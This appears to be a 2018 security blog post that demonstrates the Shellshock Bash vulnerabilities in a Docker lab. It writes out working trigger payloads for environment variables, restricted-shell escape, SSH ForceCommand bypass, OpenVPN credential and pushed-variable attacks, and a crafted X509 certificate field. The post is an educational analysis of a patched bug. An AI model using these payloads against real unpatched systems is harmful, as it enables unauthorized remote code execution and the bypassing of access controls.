The Book of Gehn

() { Magic Bash Runes

October 1, 2018

Despite of been 4 years old, Shellshock is still a very interesting topic to me not for the vulnerability itself but for the large ways to trigger it even in the most unexpected places.

Take the 4 characters () { and open the world.

Fragments found in the field.

Creativity and few hours reading man pages are all what you need.


For the following examples I created a docker image that compiles a vulnerable Bash version.

Based on this Dockerfile

From here you can download the Dockerfile and the rest of the files and build the image yourself:

$ docker build -t shellshock .      # byexample: +skip
Successfully tagged shellshock:latest

From there, run the following to get a temporal shell:

$ docker run -it --rm  --cap-add=NET_ADMIN shellshock       # byexample: +skip

If the --cap-add=NET_ADMIN looks to you a little suspicious, I don’t blame you. The flag is needed to run the OpenVPN examples.

Then, to run the SSH examples you need to run the SSH server:

$ /usr/sbin/sshd                    # byexample: +fail-fast

And for the OpenVPN examples, you need to create a TUN device:

$ mkdir -p /dev/net
$ [ -e /dev/net/tun ] || mknod /dev/net/tun c 10 200;      # byexample: +fail-fast

Magic Bash runes

Bash allows to write a function definition inside of an environment variable and pass it to a subshell.

The only requirement is that the definition must begin with the magic () { four bytes.

CVE-2014-6271: () { :;}; CMD

When Bash passes that env var, it will detect the () { prefix and it will parse and execute the remaining function definition.

The bug happen because Bash will not stop after the function’s end but it will continue parsing and executing the rest CMD.

Try this in the lab:

$ X='() { :; }; /bin/echo vuln'
$ export X
$ bash -c 'echo "foo"'

Or, in one line:

$ X='() { :; }; /bin/echo vuln' bash -c 'echo "foo"'

If you are vulnerable, that command should print vuln (and probably it will crash too).

Because the bug happens in a very early phase, CMD must be with the full path (PATH may not exist)

CVE-2014-7169: () { function a a>\ & bash -c "FILE CMD"

The incantation of these runes has two parts.

Imagine the following command that prints two words:

$ echo echo vuln
echo vuln

The first echo is the command and the rest its arguments: it has nothing weird on its own.

The () { function a a>\ part makes a incomplete function definition, in particular the fragment a>\ will redirect to a unspecified file the output and Bash will complete the definition with the next input.

And here is where the magic happens.

The first echo will not be the command but the name of the file to redirect the output.

The rest of the input echo vuln will be interpreted as a full command: that means that the first argument is converted to the name of a command.

$ X='() { function a a>\' bash -c "echo echo vuln"

$ cat echo

Instead of printing the literal "echo vuln" string and cat-ing an inexistent file "echo", a vulnerable Bash will execute the first argument and it will redirect its output to a file named "echo".

Here is another example.

$ bash -c 'echo $0 $1 | hd' A B
00000000  41 20 42 0a                                       |A B.|

If the attacker controls $0 and $1, he can trigger the vuln setting $0 to the command of his desire and $1 to # to comment out the pipe (the arguments must be without quotes, "$1" will not work).

$ X='() { function a a>\' bash -c "echo id # | hd"; cat echo

Another example, a shorter variant with less runes needed:

$ X='() { (a)=>\' bash -c "echo id"; cat echo

CVE-2014-6278: () { _; } >_[$($())] { CMD }

The interesting thing is that this doesn’t look like a parsing bug but a feature.

I was succeeded to trigger this one in a vulnerable VM from PentesterLab but I couldn’t trigger it in my own lab.

Here is how it should be invoked:

$ X='() { _; } >_[$($())] { /bin/sleep 5 }' bash -c 'date'      # byexample: +skip

Subshells from Python, Ruby

It is not necessary to run Bash directly to trigger the vuln.

Any process that pass the env variables to a vulnerable Bash is enough:

$ X='() { :; }; echo "vuln"' python -c 'import os; os.system("ls")'

Python’s os.system spawns a shell, typically /bin/sh and runs inside it the given command.

The trick is that /bin/sh in some mainstream systems is a link to /bin/bash, enabling the bug to other interpreters.

Python, Ruby, virtually any software the spawn a subshell is affected.

Restricted Bash bypass

We cannot trigger the vuln if the shell spawned is in restricted mode

$ X='() { :;}; /bin/echo vuln' bash -r -c 'echo baz'

This is because:

“A restricted shell […] (does not allow) importing function definitions from the shell environment at startup”

But the same man page gives us a way to escape: nothing prevent us to trigger the vuln within the restricted shell:

“When a command that is found to be a shell script is executed […], rbash turns off any restrictions in the shell spawned to execute the script.”

The only thing that we need is just an executable shell script in the PATH to target it:

$ cat /bin/egrep
exec grep -E "$@"

$ X='() { :;}; /bin/echo vuln' bash -r -c 'egrep'

This may allow you to escape from the restricted shell or at least it will allow you to perform some prohibited actions like cd or redirections:

$ X='() { :;}; cd /home ; echo "foo" > bar ' bash -r -c 'egrep'

$ cat /home/bar

I am sure that there are other clever and creative ways to priv esc using shellshock besides using a setuid program.

If you think, this can be used for a privilege escalation: running as a normal user, if a setuid program spawn a shell you will get a path to root pretty straightforward.


SSH will send some environment variables by default, like TERM regardless of the configuration of the server or client as long as we allocate a remote pseudo-terminal (-t)

” […] the TERM environment variable is always sent whenever a pseudo-terminal is requested as it is required by the protocol.”

$ TERM='() { :;}; /bin/echo vuln' ssh -t -p 2201 exit

This may seems pointless because we have a remote shell anyways.

But SSH has a ForceCommand option that set a command to be executed when the user logs in, ignoring any command supplied by him.

This is used by some folks to restrict the access to the system, typically setting this to /bin/false or something like that:

$ ssh -p 2202 'ls'
No shell for you. Sorry.

But the forced command is executed by the user’s shell configured in the server. If this one is Bash, we can bypass the restriction.

This option opens another crack as it sets the SSH_ORIGINAL_COMMAND environment variable with the value of the intended and ignored command.

So, if instead ls we set our magic runes we will get remote execution:

$ ssh -p 2202 '() { :;}; /bin/echo vuln'


By the way, the OpenVPN repository has a very complete script that shows you how to create CA, Certs and other stuff. Nice!

In the following examples the configuration files vpn-srv.conf and vpn-cli.conf sets the IP addresses, ports and certificates: standard stuff.

In each example I am passing the extra parameters that enable the attack explicitly via command line.

User and Pass

In this first scenario the server uses a Bash script to verify the user’s name and password.

To open the door to the vulnerability, the server must pass the credentials using environment variables.

OpenVPN will reject this by default so we need to set the highest security level with --script-security 3 to allow this.

$ openvpn --config vpn-srv.conf --auth-user-pass-verify via-env --mode server --script-security 3 >/dev/null &

From the client side, the magic runes need to be in the credential file, in the place of the password:

$ openvpn --config vpn-cli.conf --auth-user-pass evil-cred --pull >/dev/null   # byexample: +stop-on-silence +timeout=5

$ cat evil-cred
() { :;}; /bin/touch pwned

And presto, the client has remote execution in the server.

But, only in the password…. Why?

The runes need to be in the password, because it is not remapped.

OpenVPN remaps the values of the env variables allowing a very reduced set of symbols; the password is not affected, thanks God!

It could be in the username too as starting OpenVPN 2.0.1 it is not remapped any more when it is passed to OPENVPN_PLUGIN_AUTH_USER_PASS_VERIFY plugin.

If this is vulnerable or not is another story.

Push and Pull

Now the roles are inverted here.

In this case the server will set up a trap to get remote execution on the client side.

For this, it pushes a environment variable to the client with the magic runes:

$ openvpn --config vpn-srv.conf --push 'setenv-safe Z "() { :;}; /bin/touch pwned"' &

The client needs to pull the variables and execute some external script.

I chose --up but other should work

$ openvpn --config vpn-cli.conf --up --script-security 2 --pull   # byexample: +stop-on-silence +timeout=5

$ [ -e pwned ] && echo "you've been pwned"
you've been pwned

The setenv-safe sets an environment variable with a safe name (prefixed with OPENVPN) but the trick is not in the name but in its content.

The client will execute a shell script (needs at least --script-security 2) and the malicious env var will be pushed to the client, executed and exploited.

X509 param

This one is tricky.

All the scripts that OpenVPN can execute receive a remapped version of the environment variables.

Depending of the variable the remap allows more or less character but in any case the remap process destroys the magic runes.

But the are exceptions: password as it was mentioned before and X509_{n}_{m}.

When a endpoint uses an external script to validate the TLS identity through --tls-verify, it receives an environment variable for each part of the Subject of the both certificates: the client’s and the server’s.

Here the server sets up an evil certificate:

$ openvpn --config vpn-srv.conf --cert evil.crt --key evil.key  >/dev/null &

The malicious certificate has a crafted emailAddress inside of the Subject that has the incantation.

$ openssl x509 -in evil.crt -text
        Version: 3 (0x2)
        Serial Number: 2 (0x2)
    Signature Algorithm: sha256WithRSAEncryption
        Subject: C=KG, ST=NA, <...>emailAddress=() { :;}; /bin/cp /bin/cp /

On the client side, we just have to verify TLS with a script and allow it to run with --script-security 2:

$ openvpn --config vpn-cli.conf --tls-verify --script-security 2   # byexample: +stop-on-silence +timeout=5

$ [ -e /cp ] && echo "you've been pwned"
you've been pwned

The variables X509_{n}_{m} will contain the raw pieces of Subject of the client’s certificate ({n} = 1) and the server’s certificate ({n} = 0) where {m} will have the Subject’s field name, like emailAddress.

Does it mean that we can reverse the roles and exploit the server? Who knows.

In my container lab I couldn’t trigger the bug: it seems that the server verification fails but it doesn’t execute the payload.

So in theory yes, but I don’t have evidence.

Final thoughts

What I can say? Having a remote execution crafting a X509 attribute writing just () { makes me think about the complexity of the software with a smile in my face.

See these in lcamtuf’s post

There are more vulnerabilities and vectors out there than the shown here: Web Servers, CUPS, DHCP.

Shellshock came up 4 years ago and it is still surprising me.

Related tags: bash, shellshock, hacking

() { Magic Bash Runes - October 1, 2018 - Martin Di Paola